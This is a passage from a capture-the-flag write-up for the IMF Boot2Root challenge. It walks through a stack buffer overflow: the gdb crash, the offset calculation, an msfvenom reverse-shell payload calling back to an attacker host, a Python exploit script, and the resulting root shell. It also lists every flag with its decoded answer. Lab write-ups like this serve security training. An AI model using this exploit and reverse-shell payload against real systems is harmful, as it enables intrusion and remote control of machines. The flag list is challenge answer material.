Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Submitted for review.
Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0xffffd254 (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9AfT\322\377\377Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag”…)
EBX: 0x0
ECX: 0xf7fa4890 –> 0x0
EDX: 0x16
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x35664134 (‘4Af5’)
ESP: 0xffffd300 (“f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
EIP: 0x41366641 (‘Af6A’)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x41366641
[————————————stack————————————-]
0000| 0xffffd300 (“f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0004| 0xffffd304 (“8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0008| 0xffffd308 (“Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0012| 0xffffd30c (“g1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0016| 0xffffd310 (“2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0020| 0xffffd314 (“Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0024| 0xffffd318 (“g5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0028| 0xffffd31c (“6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41366641 in ?? ()
gdb-peda$ info frame
Stack level 0, frame at 0xffffd304:
eip = 0x41366641; saved eip = 0x66413766
called by frame at 0xffffd308
Arglist at 0xffffd2fc, args:
Locals at 0xffffd2fc, Previous frame’s sp is 0xffffd304
Saved registers:
eip at 0xffffd300
Then trying to identify then length of the buffer:
root@kali:~/boxes/imf# /usr/bin/msf-pattern_offset -q 41366641
[*] Exact match at offset 168
So now I can start building the exploit:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.11 LPORT=4444 -f python -b “\x00\x0a\x0d”
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf = b””
buf += b”\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b”
buf += b”\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e”
buf += b”\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34″
buf += b”\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc”
buf += b”\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94″
buf += b”\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21″
buf += b”\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5″
buf += b”\x30\x66\x4d\x86″
Let build exploit.py:
I will run it from my Kali box as the target has only python3… And I have issues when trying to concatenate bytes and text!
#!/usr/bin/python
import sockethost = “192.168.0.18”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 7788))
s.recv(1024)
#Sending the Agent ID
s.send(“48093572\n”)
s.recv(1024)
#Select menu option 3
s.send(“3\n”)
s.recv(1024)ret = “\x63\x85\x04\x08”
buf = “”
buf += b”\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b”
buf += b”\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e”
buf += b”\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34″
buf += b”\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc”
buf += b”\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94″
buf += b”\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21″
buf += b”\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5″
buf += b”\x30\x66\x4d\x86″
#Adding NOPs
pad = “\x90” * 73
buffer = buf + pad + ret
s.send(buffer)
s.recv(1024)
./exploit.py
Bingo!
root@kali:~/boxes/imf# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 54970
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
Flag.txt
TheEnd.txt
cat Flag.txt
flag6{R2gwc3RQcm90MGMwbHM=}
cat TheEnd.txt
____ _ __ __
/ _/_ _ ___ ___ ___ ___ (_) / / /__
_/ // ‘ \/ _ \/ _ \(_-<(_-</ / _ \/ / -_)
/___/_/_/_/ .__/\___/___/___/_/_.__/_/\__/
__ __/_/ _
/ |/ (_)__ ___ (_)__ ___
/ /|_/ / (_-<(_-</ / _ \/ _ \
/_/__/_/_/___/___/_/\___/_//_/
/ __/__ ___________
/ _// _ \/ __/ __/ -_)
/_/ \___/_/ \__/\__/
Congratulations on finishing the IMF Boot2Root CTF. I hope you enjoyed it.
Thank you for trying this challenge and please send any feedback.
Geckom
Twitter: @g3ck0ma
Email: geckom@redteamr.com
Web: http://redteamr.com
Special Thanks
Binary Advice: OJ (@TheColonial) and Justin Stevens (@justinsteven)
Web Advice: Menztrual (@menztrual)
Testers: dook (@dooktwit), Menztrual (@menztrual), llid3nlq and OJ(@TheColonial)
All the flags and their decoded version:
flag1{YWxsdGhlZmlsZXM=}
allthefiles
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
imfadministrator
flag3{Y29udGludWVUT2Ntcw==}
continueTOcms
flag4{dXBsb2Fkcjk0Mi5waHA=}
uploadr942.php
flag5{YWdlbnRzZXJ2aWNlcw==}
agentservices
flag6{R2gwc3RQcm90MGMwbHM=}
Gh0stProt0c0ls